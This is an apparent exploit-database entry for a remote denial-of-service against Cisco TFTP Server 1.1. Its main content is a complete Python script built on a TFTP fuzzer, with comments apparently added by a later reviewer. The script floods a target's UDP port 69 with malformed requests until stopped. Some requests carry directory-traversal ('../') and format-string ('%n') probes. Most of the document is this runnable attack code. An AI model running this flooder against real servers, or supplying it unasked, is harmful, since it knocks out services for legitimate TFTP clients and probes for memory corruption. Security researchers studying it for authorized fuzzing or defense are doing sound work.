
Cisco TFTP Server 1.1 - Denial of Service

Published 25 Mar 2010 — reported by _SuBz3r0_ (source: exploit-db)

This is a remote denial-of-service (DoS) exploit for Cisco TFTP Server 1.1. The Python script wraps Ilja van Sprundel's tftpd fuzzer, which generates malformed TFTP datagrams covering RFC 1350 (base protocol), RFC 2090 (multicast), RFC 2347 (options), RFC 2348 (blksize) and RFC 2349 (timeout/tsize), and sends them to UDP port 69 of the target until interrupted; the fuzzer is blind, so the DoS is the server failing on one of the malformed requests rather than a single crafted packet. Note that some of the generated inputs are vulnerability probes rather than plain malformation (`../` filename prefixes and `%n` format-string runs), so a crash should be triaged for memory corruption, not just availability. The author reports it tested against fully patched Windows XP SP3 and Windows Server 2003.

Code
# Exploit Title: [Cisco TFTP Server 1.1]
# Date: [2010-03-25]
# Author: [_SuBz3r0_]
# Software Link: [http://www.oldversion.com/Cisco_TFTP_Server.html]
# Version: [1.1]
# Tested on: [XP SP3,Win2k3]
# CVE : [if exists]
# Code :
#Cisco TFTP Server v1.1 DoS
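# NOTE(review): this tool floods the target with malformed TFTP requests until
# interrupted and will also disrupt legitimate TFTP clients of that server.
# Run it only against systems you are authorized to test.
#
# Banner.  print() with a single argument is valid on both Python 2 and 3;
# the original `print "..."` statements do not parse on Python 3.
print("")
print("##############################################")
print("#                 _SuBz3r0_                  #")
print("##############################################")
print("")
print("Cisco TFTP v1.1 Remote DoS")
print("Just For Fun")
print("tftp_fuzz.py [ip of server]")
print("")
print("Greetz:piloo le canari & MaX")
print("Credits to Ilja van Sprundel")
print("Tested on: French Windows Xp Sp3 fully Patched")
print("")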

#!/usr/bin/python
# tftpd fuzzer by Ilja van Sprundel
# implements rfc 1350, 2090, 2347, 2348, 2349
#
# todo: - 1 option per packet
#     - lots (>100) (small) options per packet
#     - add better option support to OACK
#    - client fuzzing ?
import os, socket, sys, struct, random
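# Destination UDP port: TFTP's well-known port (RFC 1350).  Overridden by
# argv[2] in the __main__ block.
port = 69

# Transfer-mode strings offered in requests: the RFC 1350 modes
# netascii/octet/mail plus the older "binary" alias.  The name shadows the
# builtin `type`; it is kept because fuzz_rw() in the original refers to it.
# Bytes literals so the values concatenate with the byte strings the fuzzer
# builds on either Python version.
type = [b"netascii", b"octet", b"binary", b"mail"]

# Option names from RFC 2348 (blksize) and RFC 2349 (tsize).  The original
# listing spelled the first one "blkzise", so the real blksize option path in
# the server was never exercised; only an unknown option was sent.
asize = [b"blksize", b"tsize"]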
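class fuzz:
    """Generate and send random, mostly malformed TFTP datagrams.

    This is Ilja van Sprundel's tftpd fuzzer (RFC 1350 base protocol plus the
    RFC 2090/2347/2348/2349 option extensions).  Every field separator and
    value is dropped, oversized or corrupted with some small probability, so
    the output ranges from well-formed requests to raw garbage.  Two of the
    generated inputs are classic vulnerability probes rather than plain
    malformation: ``../`` filename prefixes (directory traversal) and a run of
    ``%n`` printf directives (format-string write).  A server that misbehaves
    on either deserves a closer look than "it crashed".

    All generated data is ``bytes``, so the class works unchanged on Python 2
    (where ``bytes`` is ``str``) and Python 3; the original listing built
    ``str`` via ``chr()`` and ``/`` division, which only works on Python 2.
    Randomness comes from the module-level ``random`` state; seed it for a
    reproducible packet stream.
    """

    # Transfer-mode strings offered in requests: the RFC 1350 modes
    # netascii/octet/mail plus the older "binary" alias.  Kept on the class so
    # the fuzzer does not depend on the module-level ``type`` list (whose name
    # shadows the builtin).
    MODES = [b"netascii", b"octet", b"binary", b"mail"]
    # Option names from RFC 2348 (blksize) and RFC 2349 (tsize).  The original
    # listing had the typo "blkzise", which meant the real blksize option was
    # never sent.
    SIZE_OPTIONS = [b"blksize", b"tsize"]
    # Format-string probe returned by randstring() about 1 time in 6
    # (copied verbatim from the original listing).
    FORMAT_PROBE = b"%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"

    def __init__(self):
        """Nothing to set up: the generator is stateless apart from ``random``."""

    def randstring(self, len):
        """Return ``len`` random non-NUL bytes, or (1 in 6) the ``%n`` probe.

        NUL is excluded so the result stays inside a single NUL-terminated
        TFTP field.  The parameter name ``len`` is kept from the original
        (it shadows the builtin inside this method only).
        """
        if random.randint(0, 5) < 5:
            return bytes(bytearray(random.randint(1, 255) for _ in range(len)))
        return self.FORMAT_PROBE

    def randbin(self, len):
        """Return ``len`` uniformly random bytes (NUL allowed)."""
        return bytes(bytearray(random.randint(0, 255) for _ in range(len)))

    def _numeric_value(self, limit):
        """Return an ASCII decimal in [0, limit], negated half of the time.

        The "-" prefix probes sign handling in the server's option parser.
        """
        value = str(random.randint(0, limit)).encode("ascii")
        if random.randint(0, 1):
            return b"-" + value
        return value

    def _fuzz_options(self):
        """Return zero or more RFC 2347 ``name NUL value NUL`` option pairs.

        Option indices 0-15 are random names; 16-19 are the well-known
        multicast / blksize / tsize / timeout options.  The sequence may be
        cut short so that the last pair lacks its terminating NUL.
        """
        count = random.randint(0, 100)
        # 1 in 11: stop emitting at a random pair, leaving it unterminated.
        if not random.randint(0, 10):
            cut_at = random.randint(0, count)
        else:
            cut_at = None
        # Exactly one random-named option gets an oversized (up to 3000 B) name.
        long_one = random.randint(0, count)
        # 1 in 11: only the well-known options, and fewer of them.  The
        # original used "/", which yields a float (and a TypeError in range())
        # on Python 3; "//" floors on both versions.
        if not random.randint(0, 10):
            low = 16
            count = count // 4
        else:
            low = 0

        data = b""
        for i in range(count):
            which = random.randint(low, 19)
            if which < 16:
                data += self.randstring(random.randint(0, 3000 if long_one == i else 100))
                data += b"\0"
                data += self.randstring(random.randint(0, 100))
            elif which == 16:
                data += b"multicast\0"
                # RFC 2090 says the request value is empty; 1 in 6 send something.
                if not random.randint(0, 5):
                    if random.randint(0, 1):
                        data += self.randstring(random.randint(0, 50))
                    else:
                        data += str(random.randint(0, 0xffffffff)).encode("ascii")
            elif which in (17, 18):
                data += random.choice(self.SIZE_OPTIONS) + b"\0"
                if random.randint(0, 10):
                    limit = 65535 if random.randint(0, 1) else 0xffffffff
                    data += self._numeric_value(limit)
                else:
                    data += self.randstring(random.randint(0, 50))
            elif which == 19:
                data += b"timeout\0"
                if random.randint(0, 10):
                    kind = random.randint(0, 5)
                    # Mostly in the RFC 2349 range (1-255 s); sometimes a 16- or
                    # 32-bit value.  The original's if/if/else made the 255
                    # limit dead code (the else overrode it), so the in-range
                    # case was never produced.
                    if kind < 4:
                        limit = 255
                    elif kind == 4:
                        limit = 65535
                    else:
                        limit = 0xffffffff
                    data += self._numeric_value(limit)
                else:
                    data += self.randstring(random.randint(0, 50))

            if cut_at is not None and i == cut_at:
                return data
            data += b"\0"
        return data

    def fuzz_rw(self):
        """Build the body of an RRQ/WRQ (opcode excluded) as bytes.

        Layout per RFC 1350/2347: ``filename NUL mode NUL [options]``.  Each
        terminator and field is dropped or corrupted with a small probability,
        so the result ranges from a valid request to garbage.
        """
        # 1 in 51: completely empty request body.
        if not random.randint(0, 50):
            return b""

        data = b""
        # 1 in 11: prefix the filename with one or many "../" components to
        # probe for directory traversal outside the server's root.
        if not random.randint(0, 10):
            if random.randint(0, 1):
                data = b"../"
            else:
                data = b"../" * random.randint(1, 100)
        data += self.randstring(random.randint(0, 3000))

        # 1 in 11: no terminating NUL after the filename.
        if not random.randint(0, 10):
            return data
        data += b"\0"

        # 1 in 101: no mode field at all.
        if not random.randint(0, 100):
            return data
        # Usually a real mode string, 1 in 6 a random one.
        if random.randint(0, 5):
            data += random.choice(self.MODES)
        else:
            data += self.randstring(random.randint(0, 3000))

        # 1 in 11: no NUL after the mode; otherwise 1 in 11: no options.
        if not random.randint(0, 10):
            return data
        data += b"\0"
        if not random.randint(0, 10):
            return data

        return data + self._fuzz_options()

    def make_data(self):
        """Return one random TFTP datagram (bytes).

        Roughly 6 in 11 are read/write requests (the richest parser path);
        the rest are DATA, ACK, ERROR and OACK packets with random block
        numbers and payloads, or pure random bytes with no valid opcode.
        """
        which = random.randint(0, 10)
        if which < 6:
            # RRQ twice as often as WRQ: reads are more likely to be accepted,
            # so they get further into the server's processing.
            opcode = b"\x00\x01" if random.randint(0, 2) else b"\x00\x02"
            return opcode + self.fuzz_rw()
        if which == 6:
            # DATA: random block number, payload up to 3000 B (> 512 B max).
            return b"\x00\x03" + self.randbin(2) + self.randbin(random.randint(0, 3000))
        if which == 7:
            # ACK: random block number, 1 in 11 with a trailing payload.
            d = b"\x00\x04" + self.randbin(2)
            if not random.randint(0, 10):
                d += self.randbin(random.randint(0, 3000))
            return d
        if which == 8:
            # ERROR: random code, random message, 1 in 11 without its NUL.
            d = b"\x00\x05" + self.randbin(2) + self.randstring(random.randint(0, 1000))
            if random.randint(0, 10):
                d += b"\0"
            return d
        if which == 9:
            # OACK with 1000 random bytes (no structured option support yet).
            return b"\x00\x06" + self.randbin(1000)
        # No opcode at all: up to 512 bytes usually, sometimes up to 10000.
        times = 512 if random.randint(0, 2) else random.randint(512, 10000)
        return self.randbin(random.randint(0, times))

    def run(self, target=None, target_port=None):
        """Send random datagrams to the target until Ctrl-C, then print the count.

        Args:
            target: destination host.  Defaults to the module-level ``host``
                set by the command-line entry point (NameError if neither is
                provided).
            target_port: destination UDP port; defaults to the module-level
                ``port``.  Coerced with int() so a string from argv works.

        A new socket is created for every packet, so each request leaves from
        a fresh ephemeral source port (a new TFTP transfer ID) rather than
        looking like a retransmission.  There is no rate limiting.  Writes a
        "." to fd 1 per packet; exits with status 1 if a socket cannot be
        created.
        """
        if target is None:
            target = host
        if target_port is None:
            target_port = port
        target_port = int(target_port)
        packets = 0
        try:
            while True:
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                except socket.error:
                    print("socket() failed")
                    sys.exit(1)
                try:
                    s.sendto(self.make_data(), (target, target_port))
                finally:
                    # Close even if sendto() raises (e.g. network unreachable).
                    s.close()
                os.write(1, b".")
                packets += 1
        except KeyboardInterrupt:
            print("\nPackets: " + str(packets))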

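if __name__ == '__main__':
    # Usage: tftp_fuzz.py <target ip> [port].  The original exited 0 silently
    # when no target was given; report the mistake and fail instead.
    if len(sys.argv) <= 1:
        sys.stderr.write("usage: %s <target ip> [port]\n" % sys.argv[0])
        sys.exit(1)
    host = sys.argv[1]
    if len(sys.argv) >= 3:
        # argv values are strings; sendto() requires an int port (the
        # original stored the string and failed on the first send).
        port = int(sys.argv[2])
    f = fuzz()
    f.run()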
